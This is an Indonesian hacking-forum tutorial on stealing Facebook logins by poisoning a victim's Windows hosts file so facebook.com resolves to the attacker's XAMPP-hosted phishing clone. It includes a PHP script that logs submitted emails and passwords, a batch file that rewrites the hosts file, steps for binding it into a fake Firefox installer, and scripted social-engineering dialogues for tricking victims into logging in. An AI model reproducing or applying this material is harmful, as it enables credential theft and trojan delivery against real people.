author: darkslayer aka plonk5638
thanx to: cruz3n, like_beck, p4njul, potteraradclife, rexgant, jastis, meonkzt, dopunk, lim/widiasta_7, latanggoart
Sebelumnya saya mohon maaf jika penjelasan pada artikel ini kurang memuaskan dikarenakan kemampuan saya yang kurang.
Sebetulnya saya ingin membahas hal ini sejak 2 bulan lalu, akan tetapi dikarenakan kemampuan saya yang kurang ini, maka saya pun memutuskan untuk menundanya, dan mempelajarinya lebih dalam lagi. Tapi apa daya keinginan tidak selalu berbanding lurus dengan otak. Tapi berkat reply dari mas latanggoart, dan reply mas potter pada topik ini akhirnya saya pun memberanikan diri membahas topik ini. Sekiranya jika ada kesalahan harap di beri masukan
=============
OK. Kali ini kita akan membahas implementasi phising dengan metode DNS spoofing. Yang merupakan salah satu teknik lama. Bagi anda yang belum pernah membuat phising, saya sarankan jangan membaca ini terlebih dahulu, karena di sini tidak akan membahas phising dari basic melainkan langsung ke topik permasalahan dari DNS spoofing.
Banyak orang yang berpendapat bahwa phising tidaklah begitu berbahaya selama kita mengetahui letak perbedaan urlnya. Entah anda mengirimkan dari fake email admin@facebook.com atau tidak itu tidak menjadi soal, karena hasilnya adalah kejelian mata kita dalam melihat url pada address box browser kita. Siapa sih yang mau masuk url seperti ini:
http://facebook.hostse.com
http://fazebuk.com
http://facebooklogin.com
htpp://h1.ripway.com/facebook
tentu saja cuma orang awam saja bukan??
akan tetapi siapa yang mengira ketika dia mengetikkan alamat www.facebook.com tetapi ternyata dia memasuki situs yang salah. Karena walaupun address nya benar, tapi tampilannya adalah tampilan web phising kita??
yang mau mengecek terlebih dahulu source code dan IP dari suatu situs itu tentu hanya dilakukan oleh beberapa orang saja. Karena url yang akan kita sebarkan adalah tetap menjadi www.facebook.com , bukan url-url aneh seperti di atas tadi,jadi peluang kita untuk mendapatkan account facebook target menjadi lebih besar.
Sebelumnya mas potter telah membahas mengenai teknik DNS ini pada topik http://www.jasakom.com/showthread.php?27897-Hack-FB-(or-anything)-Clear-amp-Easy-For-Newbie, akan tetapi teknik phising melalui DNS spoofing ini masih bersifat local, yaitu kita harus melakukan konfigurasi pada komputer yang akan di akses oleh korban. btw, Saya sangat salut sekali dengan mas potter yang harus menjelaskan tutorial phisingnya dengan sendirian, demi membagi2 ilmu kepada teman-teman yang belum mengetahuinya. ;)
Perbedaan topik yang dijelaskan mas potter dengan topik yang akan saya bahas ini hanya terletak pada jaraknya saja, jika pada topik mas potter diharuskan mengakses fisik PC, maka pada topik ini akan saya jelaskan teknik phising tanpa mengakses komputer korban.
Sebelum kita berlanjut ke topik utama, sebaiknya kita harus mengetahui hal ini terlebih dahulu. Karena inilah yang menjadi hal utama kebehasilan implementasi teknik ini. hal ini adalah masalah tentang IP kita.
Saya mencoba beberapa alamat IP yang dihasilkan oleh modem berikut ini:
smart, XL modem, IM2, blackberry yang digunakan sebagai modem, Dial-up IM3, speedy, fastnet, fren, wifi, dan LAN.
Hasilnya ketika saya ujicoba ternyata memberikan pertanyaan yang sangat membingungkan, karena cuma IP dari modem IM2 saja yang dapat di ping dari luar jaringan. Kalau tidak percaya coba liat IP anda, lalu suruh teman anda untuk melakukan ping. Maka IP dari semua modem di atas selain IM2 akan bernilai RTO (request time out).
Penjelasan yang saya ketahui: (kemampuan penulis terbatas)
pada modem yang saya sebutkan di atas selain IM2, IP address kita berbeda dengan IP gateway. Sedangkan pada IM2 IP address sama dengan IP gateway. Anda pasti tahukan sedikit mengenai jaringan??
contoh: pada LAN
PC kita - switch - PC server - internet - facebook
PC kita: ip address = 10.100.164.2 , IP gateway = 10.100.164.1
PC server: IP internal = 10.100.164.1 , ip eksternal = 210.10.10.10
jika kita melakukan ping kepada facebook.com (220.20.20.20), maka jalurnya adalah:
PC kita : mas switch ip saya adalah 10.100.164.2 tolong donk terusin pesan saya ke komputer server yang beralamat di 10.100.164.1, saya mau melakukan ping ke server facebook nich.
switch: OK mas, saya teruskan
switch: mas server, komputer dengan ip 10.100.164.2 mau melakukan ping ke server facebook, tolong teruskan
PC server: OK, saya teruskan.
PC server: pakdhe, ente punya alamat ip hostname facebook kagak?
file HOSTS pada PC server: waduh bos,, maafin, sejak lu install gw, elu kagak pernah ngasih ane informasi apa-apa selain localhost doank
PC server: oh ya, sory bro, y udah gw nanya ke DNS server aja dech
PC server: kak, tau IP dari hostname facebook g?
DNS server: iya, ini saya punya. Alamat IP nya adalah 220.20.20.20. Tolong di ingat di cache ya, biar adik nggak nanya ke kakak lagi. nanti klo waktunya habis silahkan hubungi kakak lagi. Soalnya kakak pusing banget nich klo semua PC minta alamat IP ke kakak terus
PC server: OK ,thanx
PC server: hoe, komputer dengan alamat IP 220.20.20.20 , gw mau ngePING nich, boleh nggak? (pada proses ini, semua komputer tidak mengetahui apakah alamat ip yang di berikan oleh DNS server adalah benar-benar alamat ip facebook atau bukan. Yang di ketahui oleh setiap PC adalah DNS server selalu memberikan informasi yang benar, jadi kasarannya akan langsung percaya)
server facebook: iya boleh, nich balesannya ping anda
PC server: thanx
Komputer server: nich, ada balasan dari komputer dengan IP 220.20.20.20 yang katanya server DNS hostnamenya facebook.com, tolong terusin ke ip 10.100.164.2 ya? soalnya saya ingat bahwa tadi ada pesanan dari alamat ip itu untuk melakukan ping ke facebook
switch: OK
switch: OK, thanx udah menunggu, nich balesan dari ping lu tadi
PC kita: iya mas, terima kasih
maaf kepanjangan, tapi klo nggak gitu nggak akan jelas sampe pembahasan akhir :(
Keterangan:
PC kita akan mengenali alamat IP dari server facebook.com dari informasi yang di dapat oleh komputer server. Akan tetapi facebook tidak mengetahui bahwa ping yang telah dia dapatkan tadi berasal dari komputer anda (10.100.164.2), yang di ketahui oleh server facebook adalah bahwa dia telah mendapatkan ping dari komputer yang mempunyai IP 210.10.10.10 (IP eksternal PC server) bukan 10.100.164.1 (IP internal PC server).
Secara singkat beberapa ISP yang saya sebutkan di atas tadi selain IM2 adalah menggunakan sistem sama seperti pada LAN ini agar mempermudah pengawasan security. Sedangkan pada IM2 anda diberikan hak seperti layaknya komputer server tadi.
Jadi bagi teman2 yang menggunakan komputer smart jangan berbangga dulu jika dengan harga murah, kecepatan download anda pada server indowebster bisa mencapai 100kbps (dgn IDM), sedangkan pada IM2 hanya bisa mencapai 40kbps (dgn IDM). Karena dengan sistem seperti ini pelanggan smart bagaikan menaiki sebuah bus. Bila penumpang sepi, maka anda secara leluasa bebas duduk dimana saja, mau tidur2an di 3 kursi sekaliguspun tidak masalah. Akan tetapi jika para pengguna internet sudah banyak yang menggunakan smart, maka jangan kaget kalau anda harus rela berdiri sampai ke tujuan. Apalagi ditambah anda di berikan beberapa batasan-batasan, misalnya di larang merokok di bus (kendaraan public). Berbeda dengan pengguna IM2, disini saya ibaratkan sebagai penumpang taxi, tidak ada yang boleh menaiki taksi tersebut selama penumpang tidak membolehkannya. Dan anda pun bebas merokok. tapi biayanya mahal (kendaraan private)
Begitupun soal ping yang saya ceritakan di atas. bagi pengguna modem yang saya sebutkan selain im2 di atas tadi, server facebook / komputer di luar jaringan tidak akan mengetahui alamat dari IP anda tetapi hanya mengetahui alamat dari IP server anda. Itulah sebabnya mengapa notifikasi server trojan anda tidak bisa menghubungi client trojan yang ada di PC anda jika anda mengguakan IP public. Untuk IM2, sebaliknya, layaknya komputer server, dia dan server facebook akan saling mengenal IP addressnya satu sama lain. Sehingga akses langsung dapat dimungkinkan terjadi. Dan hal ini lah yang menjadi syarat penting dalam mempraktekkan topic berikut ini . . ayooo semangattt.. ini masih pengantarnya aja. . (^-^)
contoh ip smart:
ip address: 10.101.20.57
subnet mask: 255.255.255.0
default gateway: 10.101.20.1
contoh ip IM2
ip address: 114.13.100.176
subnet mask: 255.255.255.0
default gateway: 114.13.100.176
NOTE:
1. maaf, saya bukan sales IM2, ato suka memakai IM2, karena saya tidak mengetahui modem mana saja yang memberikan private IP seperti IM2. Apalagi saya sangat tidak suka sekali dengan peraturan bandwitch di IM2 sendiri.
2. terima kasih buat rexgant, karena atas jawaban singkat nya saya bisa memberi sedikit penjelasan sebagai kata pengantar topic ini
padahal cm 1x nanya ngasal,tp gambaran dari jawabannya sangat cemerlang.thanx bang (^-^)
plonk: mengapa ip modem2 di atas ada yang tidak bisa di ping dan ada yang bisa?
rexgant: hal itu karena memang oleh server/ISP nya IP nya di set tidak bisa di ping.
OK, lebih singkatnya silahkan kunjungi situs http://just-ping.com dan masukkan alamat IP anda. Situs ini akan melakukan ping dari berbagai negara. contoh: alamat ip saya saat ini dengan modem IM2 114.58.56.177
Singkatnya jika alamat IP anda ternyata tidak bisa di ping dari luar jaringan, maka mohon maaf sekali jika anda hanya bisa membaca artikel ini tanpa bisa praktek :(Maka itulah kenapa saya tetap menggunakan IM2 meskipun terdapat quota, bandwitch sedang, dan berbagai aturan penggunaan IM2 yang menyebalkan. Hal ini karena saya bisa langsung melakukan online scanning, agar saya bisa melakukan koneksi ke server trojan saya, dll dech, karena kalau di sebutkan mungkin kita akan lari dari pembahasan.
Bagi yang tidak bisa di ping jangan terlalu bersedih hati, karena jika target anda masih berada dalam 1 jaringan (wifi / LAN) maka anda masih bisa mempraktekkan hal ini ,tetapi cuma dalam batasan pada jaringan itu sendiri ya.
NOTE: kalau masih pengen praktek iseng-isengan, bisa juga dilakukan dengan virtual komputer dengan bantuan vmware / virtualbox
Dan satu hal lagi yang harus kita bahas terlebih dahulu adalah korban harus menggunakan OS windows, karena dalam tulisan ini kita akan melakukan DNS spoofing dengan melakukan file hosts poisoning.
Maaf kepanjangan, tapi lebih baik saya jelaskan terlebih dahulu daripada anda merasa sia-sia membaca sampai akhir kalimat saya :(
nutrisi
apa itu DNS (domain name server)??
system yang digunakan untuk mentranslate hostname suatu komputer menjadi alamat IP. (sumber: ngarang2 sendiri). Hal ini sangat dibutuhkan dikarenakan komputer tidak dapat mengetahui lokasi suatu komputer berdasarkan hostname, akan tetapi hanya mengetahuinya lewat IP dari komputer tujuan saja.
apa itu server DNS??
komputer server yang dijadikan sebagai acuan untuk menanyakan alamat IP dari suatu hostname. Singkatnya biar nggak nyasar atau nggak kesulitan mencari lokasi perlu adanya petugas lalu lintas nya juga.
apa itu cache DNS?
suatu data yang menyimpan informasi dari DNS server mengenai alamat IP dari suatu hostname untuk sementara waktu. Hal ini perlu agar semua komputer yang menanyakan IP suatu hostname ke server DNS tidak perlu berulangkali melakukan pertanyaan yang sama. Bayangkan saja jika semua komputer menanyakan hal yang sama secara terus menerus, dapat di bayangkan betapa sibuknya server DNS itu sendiri. Untuk melihat cache DNS ini kita dapat melihatnya dengan melakukan perintah ipconfig /displaydns
C:\Documents and Settings\thunder>ipconfig /displaydns
Windows IP Configuration
www.facebook.com
----------------------------------------
Record Name . . . . . : www.facebook.com
Record Type . . . . . : 1
Time To Live . . . . : 5756
Data Length . . . . . : 4
Section . . . . . . . : Answer
A (Host) Record . . . : 220.20.20.20
localhost
----------------------------------------
Record Name . . . . . : localhost
Record Type . . . . . : 1
Time To Live . . . . : 592543
Data Length . . . . . : 4
Section . . . . . . . : Answer
A (Host) Record . . . : 127.0.0.1Dari situ dapat dilihat jika cache DNS dari hostname www.facebook.com di simpan sampai 5756 detik kemudian. Jika TTL habis, maka komputer kita akan menanyakan lagi ke server DNS.
Apa itu file HOSTS??
file sebagai tempat untuk menyimpan informasi mengenai DNS dari suatu hostname. Sebelum komputer kita (OS windows) menanyakan alamat IP dari facebook kepada server DNS, maka komputer kita akan menanyakan kepada file hosts apakah dia mempunyai informasi mengenai alamat IP dari hostname facebook atau tidak. Jika tidak maka komputer kita akan menanyakan lebih lanjut ke server DNS. file hosts ini dapat kita temukan di directory c:\windows\system32\drivers\etc. Anda bisa dengan mudah mengeditnya dengan notepad untuk menambahkan informasi mengenai DNS ini.
Apa itu DNS spoofing?
suatu teknik hacking yang dilakukan dengan cara memberikan informasi yang salah kepada komputer korban mengenai IP dari suatu hostname yang diminta oleh korban. Ingat bahwa semua komputer mempercayai semua informasi yang di berikan oleh server DNS dan file hosts (pada windows). Dan ini adalah kesalahan fatal, karena jika hacker dapat menguasai server DNS ataupun file hosts anda, maka hacker bisa dengan mudah menipu anda dengan memberikan alamat yang salah dan selanjutnya dapat ditebak sendiri apa akibatnya. Dan inilah metode yang akan kita gunakan dalam mengimplementasikan phising kita. lebih lanjut silahkan baca di postingan saya yang lain di http://www.jasakom.com/showthread.php?28050-Tolong-Ajarin-Bikin-Fake-Login
Bagaimana cara melakukan DNS spoofing?
1. mengowned server DNS (tentunya susah, saya nggak bisa)
2. mengedit file hosts (ini yang akan kita bahas)
3. menggunakan sniffer seperti cain abel (hanya bisa di lakukan di jaringan)
Ok langsung saja kita ke praktek, yaitu melakukan DNS spoofing dengan mengedit file hosts
PRAKTEK
OK, kita lanjut lagi, bahan yang di butuhkan:
1. Install aplikasi yang membuat PC kita menjadi server, dalam tulisan ini saya menggunakan XAMPP. Silahkan download kalau belum punya.
Jika sudah mari kita install, setelah instalasi selesai. Segera akses ke folder c:\xampp\htdocs . maka di situ akan ada beberapa file. File-file ini harus kita bersihkan terlebih dahulu karena keberadaaan file ini nanti nya akan mengganggu acara kita. OK, buat folder apa saja di c:\xampp\htdocs lalu taruh semua file-file tadi pada folder yang barusan anda buat (jika anda baru pertama kali menginstall xampp, maka file-file yang berada pada c:\xampp\htdocs adalah folder xampp ,index.html ,dan index.php)
2. kita siapkan script phising dan log filenya
Karena di sini saya anggap sudah pernah mempelajari phising maka tidak akan saya jelaskan.
buat file dengan nama hasil.txt
Pada mesin windows, anda tidak perlu lagi melakukan setting permission, karena secara default script file txt tadi tidak berattribut r (read-only).
dan untuk script php nya saya menggunakan ini. saya beri nama login.php
header("Location:http://www.facebook.com");
$file = "hasil.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$handle = fopen($file, 'a');
fwrite($handle, "++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
exit;
?>
taruh hasil.txt dan login.php pada directory c:\xampp\htdocs
3. kita siapkan index.php
copy paste halaman utama facebook, lalu save dengan nama index.php lalu simpan pada directory c:\xampp\htdocs.
Selanjutnya edit file index.html tadi, dan ubah beberapa bagian berikut:
a. pastikan bahwa tampilannya sama dengan situs facebook yang sesungguhnya, jika berbeda silahkan mengedit sampai sama
b. cari action="https://login.facebook.com/login.php?login_attempt=1" dan ubah menjadi action="login.php"
Jika sudah silahkan save lagi.
4. menyiapkan script sederhana untuk mempoisoning file hosts
Disini saya akan menggunakan batch file untuk melakukan poisoning terhadap file hosts korban
cls
@echo off
ipconfig /flushdns
copy c:\windows\system32\drivers\etc\hosts c:\
attrib +h +s c:\hosts
echo 114.58.56.177 >> facebook.com c:\windows\system32\drivers\etc\hosts
echo 114.58.56.177 >> www.facebook.com c:\windows\system32\drivers\etc\hosts
exit
save dengan nama ubah.bat
Tau kan cara kerjanya? sebenarnya perintah yang dibutuhkan hanya pada bagian echo saja. tapi tambahan-tambahan scriptnya saya berikan dengan alasan untuk membuat backup hosts asli korban, karena modifikasi file hosts ini bersifat permanen sehingga jika tidak dikembalikan ke bentuk semula mungkin target kita tidak akan bisa memasuki situs facebook sampai dia install ulang windowsnya lagi. Dan perlu diingat juga bahwa ip kita adalah dinamic sehingga kecil kemungkinan kita bisa mendapatkan IP kita kembali jika telah terjadi disconnect modem. (g ada gunanya lagi)
Yang perlu di perhatikan lagi pada bagian echo adalah:
- 114.58.56.177 >> merupakan IP saya, karena ini bersifat dinamic, maka anda harus menjaga agar koneksi internet anda tidak putus terlebih dahulu sebelum korban mengakses situs phising anda.
- www.facebook.com dan facebook.com >> pengentrian 2 web ini dikarenakan terdapat perbedaan antara ketika kita ketik facebook.com dan www.facebook.com
untuk lebih jelasnya silahkan lihat di bawah:
C:\Documents and Settings\thunder>nslookup
Default Server: ns2.indosat.net.id
Address: 202.155.0.15
> www.facebook.com
Server: ns2.indosat.net.id
Address: 202.155.0.15
Non-authoritative answer:
Name: a2047.w7.akamai.net
Addresses: 114.57.28.24, 114.57.28.18, 114.57.28.10, 114.57.28.25
114.57.28.19, 114.57.28.9, 114.57.28.17
Aliases: www.facebook.com, www.facebook.com.edgesuite.net
> facebook.com
Server: ns3.indosat.net.id
Address: 202.155.0.10
Non-authoritative answer:
Name: facebook.com
Addresses: 69.63.181.11, 69.63.181.12, 69.63.189.11, 69.63.189.16
> m.facebook.com
Server: ns2.indosat.net.id
Address: 202.155.0.15
Non-authoritative answer:
Name: a2047.w7.akamai.net
Addresses: 114.57.28.10, 114.57.28.25, 114.57.28.19, 114.57.28.9
114.57.28.17, 114.57.28.24, 114.57.28.18
Aliases: m.facebook.com, m.facebook.com.edgesuite.net
beda url beda IP. Jadi sudah tahu kan mengapa saya memasukkan 2 address facebook )-l
NOTE: di karenakan sript batch tersebut memodifikasi system32 maka akan terdetect oleh kaspersky sebagai "modifikasi file host", lalu kasperksy akan menanyakan apakah ingin tetap ingin melanjutkan atau tidak. Jadi jika komputer korban menggunakan kaspersky ,kecil kemungkinan script ini berhasil. Akan tetapi pada smadav script ini bisa berjalan tanpa kendala. Untuk antivirus yang lain saya belum mencobanya. Thanx
5. Sosial engineering
Sesudah menyimpan file ubah.bat tadi sebenarnya bahan-bahan kita sudah selesai. Akan tetapi siapa yang mau mendownload dan menjalankan file bat begitu saja?? tentu target akan curiga bukan?? untuk itu kita memerlukan program binder seperti microjoiner, exebinder dengan file yang kiranya mau diterima oleh korban. Untuk itu kita memerlukan sedikit teknik sosial engineering agar mengetahui file apa yang kiranya mau di download dan dijalankan oleh korban. Setelah mengetahui file apa yang di butuhkan, anda bisa membinding file tersebut dengan ubah.bat di atas dengan menggunakan program binder tentunya.
sedikit mengenai tutorial binder file bat dengan microjoiner. misalnya saya ingin menggabungkan file ubah.bat dengan file installer_firefox.exe download microjoiner di http://www.cobans.net/joiner.php
lalu download quick batch file compiler (QBFC) di http://www.abyssmedia.com/quickbfc
1. install semua aplikasi tsb 2. buka QBFC, lalu pilih open dan pilih file ubah.bat yang telah kita buat tadi. Lalu pilih build. dan berinama ubah.exe 3. buka microjoiner. drag installer_firefox.exe dan ubah.exe ke dalam layar microjoiner. Selanjutnya pilih set icon dan pilih installer_mozilla.exe agar iconnya sama dengan icon dari installer_firefox.exe. Setelah itu pilih create. Maka file gabungan tadi akan berada pada direktory tempat anda menyimpan microjoiner dengan nama joined.exe. Rename joined.exe menjadi installer_firefox.exe agar terlihat seperti installer_firefox.exe yang asli
KET: kita membutuhkan QBFC dikarenakan microjoiner tidak bisa membedakan antara file bat dengan exe, sehingga jika menggabungkan file batch tadi secara langsung maka akan terjadi error (maklum microjoiner adalah program sederhana)
Selanjutnya lakukan social engineering agar korban mau mendownload dan menginstall file installer_firefox.exe yang tadi kita buat.
Setelah korban mendownload file tadi. Usahakan agar dia langsung menjalankan software tersebut. Karena di sini kita di kejar oleh waktu. Karena jika modem anda mengalami disconnect maka semuanya akan hancur berantakan, karena IP kita telah berubah (pasti tahu kan mengenai IP dinamic)
OK. Anggap korban sudah menjalankan program kita tadi. Kini ada permasalahan selanjutnya, yaitu mengenai cache browser yang nggak akan hilang jika dia terus melakukan koneksi ke server korban dengan browser yang sama :(
Begini, coba masuk ke situs www.cruzenaldo.com atau cukup dengan melakukan perintah ping ke www.cruzenaldo.com
lalu masuk cmd dan ketik ipconfig /displaydns
C:\Documents and Settings\thunder>ping www.cruzenaldo.com
Pinging www.cruzenaldo.com [202.78.195.116] with 32 bytes of data:
Reply from 202.78.195.116: bytes=32 time=276ms TTL=56 Reply from 202.78.195.116: bytes=32 time=291ms TTL=56 Reply from 202.78.195.116: bytes=32 time=258ms TTL=56 Reply from 202.78.195.116: bytes=32 time=238ms TTL=56
Ping statistics for 202.78.195.116: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 238ms, Maximum = 291ms, Average = 265ms
C:\Documents and Settings\thunder>ipconfig /displaydns
Windows IP Configuration
www.cruzenaldo.com ---------------------------------------- Record Name . . . . . : www.cruzenaldo.com Record Type . . . . . : 1 Time To Live . . . . : 3486 Data Length . . . . . : 4 Section . . . . . . . : Answer A (Host) Record . . . : 202.78.195.116[/code] selang beberapa detik kemudian saya ketik lagi [code]C:\Documents and Settings\thunder>ipconfig /displaydns
Windows IP Configuration
www.cruzenaldo.com ---------------------------------------- Record Name . . . . . : www.cruzenaldo.com Record Type . . . . . : 1 Time To Live . . . . : 3321 Data Length . . . . . : 4 Section . . . . . . . : Answer A (Host) Record . . . : 202.78.195.116 Nah,, coba lihat time to live pada www.cruzenaldo.com = 3486 second menjadi 3321 second. Ingat kan mengenai cache DNS yang di atas tadi?? ;)
Oleh karena itu untuk menghindari komputer korban masih mengingat IP dari situs facebook yang asli maka kita perlu menghapus cache DNS nya terlebih dahulu. Oleh karena itu untuk mengakali cache DNS ini, saya memasukkan operator ipconfig /flushdns pada ubah.bat di atas untuk menghapus cache DNS yang ada.
Akan tetapi kita masih terkendala dengan adanya cache browser. Jika browser masih menyimpan cache dari situs facebook asli maka berdasarkan pengalaman , korban memerlukan waktu yang lama untuk mengakses situs facebook dari PC kita jika dia tidak pernah menghapus cache browsernya. padahal kita juga tidak boleh membiarkan alamat IP kita mengalami perubahan dikarenakan disconnect :(
Begini, pada saat browser kita pertama kali mendownload halaman facebook beserta konten2nya, maka browser akan menyimpan konten-konten tersebut pada cache. Jika kita mengakses halaman facebook lagi, maka seluruh kontennya bukan berasal dari server facebook lagi, melainkan diambil dari cache browser tersebut. Jadi selama cache ini tidak di bersihkan maka, kecil kemungkinan korban akan masuk ke localhost kita.
Oleh karena itu, saya lebih suka memilih cara sosial engineering ini.
skenario 1
hacker: mas, enaknya setiap kali kita tutup browser kita, kita mesti delete semua history,cache dan cookiesnya nggak?
victim: iya mas, saya menyetting firefox saya agar menghapus data2nya ketika menutup browser. Biar aman mas
hacker: owh,, bla..blaa..
victim: bla...blaa.. hacker: kok aneh ya mas, saya kok nggak bisa login di fb saya?
victim: bisa kok mas, mungkin bla..blaa... saya aja lagi online kok
hacker: mmh... coba dech mas tutup firefoxnya dulu, lalu masuk ke fb, soalnya saya td bisa, kok sekrng tiba2 nggak bisa
victim: ok saya coba
jika cache nya selalu di hapus setiap menutup browser, maka itu adalah kesempatan emas kita (^-^)
skenario 2
hacker: mas, seringnya pake browser apa mas?
victim: pake firefox bro, memang nya kenapa mas?
hacker: owh,, ini mas aneh banget, kenapa ya saya tidak bisa login facebook dari IE, padahal saya coba dari firefox bisa.
victim: waduh mas, nggak tahu saya, mungkin bla..bla..
hakcer: coba dech mas login facebook dari IE
victim: OK saya coba
Kenapa saya mengajak korban menggunakan browser yang jarang di pakai (dalam hal ini adalah IE)??
karena permasalahan cache browser yang tadi. Sehingga kemungkinan cache pada browser tersebut masih / sudah bersih (karena lama tidak digunakan). Cara ini tentunya lebih baik daripada memaksa korban menghapus cache browsernya yang tentunya akan menimbulkan kecurigaan.
Jika proses tersebut berhasil maka PC korban akan memasuki situs phising kita (tentunya anda harus mengaktifkan xampp terlebih dahulu). Dan selanjutnya email dan pass nya akan dapat anda lihat di c:\xampp\htdocs\hasil.txt
Jika sudah selesai, jangan lupa untuk mengembalikan file hosts korban ke kondisi semula di lain waktu. Karena jika tidak, maka komputer korban tidak akan bisa mengakses halaman facebook sampai dia install ulang windowsnya. Script pengembalian sederhananya seperti ini
cls
@echo off
del c:\windows\system32\drivers\etc\hosts
attrib -s -h c:\hosts
move c:\hosts c:\windows\system32\drivers\etc
Kesimpulan:
cara kerjanya adalah begini
kita melakukan DNS spoofing dengan cara merubah isi dari file HOSTS (file hosts poisoning). Dimana pada file HOSTS tersebut kita masukkan alamat IP kita sebagai acuan untuk situs facebook pada komputer korban. Ketika korban memasukkan alamat www.facebook.com atau facebook.com maka sebenarnya dia sedang mengakses halaman phising pada localhost kita, bukan mengakses situs facebook yang asli. Sehingga email dan pass yang di masukkan ke dalam halaman situs itu akan tercatat pada c:\xampp\htdocs\hasil.txt silahkan lihat
